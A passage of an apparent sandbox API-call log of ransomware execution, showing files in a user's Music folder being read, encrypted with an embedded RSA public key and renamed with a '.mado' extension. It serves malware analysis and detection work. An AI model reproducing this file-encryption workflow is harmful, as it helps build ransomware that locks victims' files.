Size=0x4) returned 0x3b6b7c0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe250 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe220 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe238 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe238 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b7b250 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bec8 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe238 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b468 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b250 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b468 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe220 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe208 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eab0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.389] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74b68*, nNumberOfBytesToWrite=0x66d5, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b74b68*, lpNumberOfBytesWritten=0x39cfb14*=0x66d5, lpOverlapped=0x0) returned 1 [0204.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.389] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x66da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.389] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.389] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.389] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.389] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.389] CloseHandle (hObject=0x63c) returned 1 [0204.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.390] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOiLiV5lxF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\doiliv5lxf.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOiLiV5lxF.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\doiliv5lxf.wav.mado")) returned 1 [0204.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.391] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18b20d40, ftCreationTime.dwHighDateTime=0x1d5ddec, ftLastAccessTime.dwLowDateTime=0x2ff914a0, ftLastAccessTime.dwHighDateTime=0x1d5dbc9, ftLastWriteTime.dwLowDateTime=0x2ff914a0, ftLastWriteTime.dwHighDateTime=0x1d5dbc9, nFileSizeHigh=0x0, nFileSizeLow=0xe101, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eMlVnXHfvcxzzTcr.mp3", cAlternateFileName="EMLVNX~1.MP3")) returned 1 [0204.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.392] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eMlVnXHfvcxzzTcr.mp3") returned=".mp3" [0204.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eMlVnXHfvcxzzTcr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\emlvnxhfvcxzztcr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.393] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=57601) returned 1 [0204.393] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.395] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe0db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.395] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.397] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.397] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe101, lpOverlapped=0x0) returned 1 [0204.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.398] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.399] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.399] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.399] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.399] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.399] GetLastError () returned 0x0 [0204.399] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.399] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.399] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.399] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.399] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe100) returned 0x3b80690 [0204.399] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6eab0 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe208 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6eaf8 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe220 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe250 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.400] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe268 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe250 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.401] GetCurrentThreadId () returned 0x600 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b717e0 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.401] GetCurrentThreadId () returned 0x600 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.402] 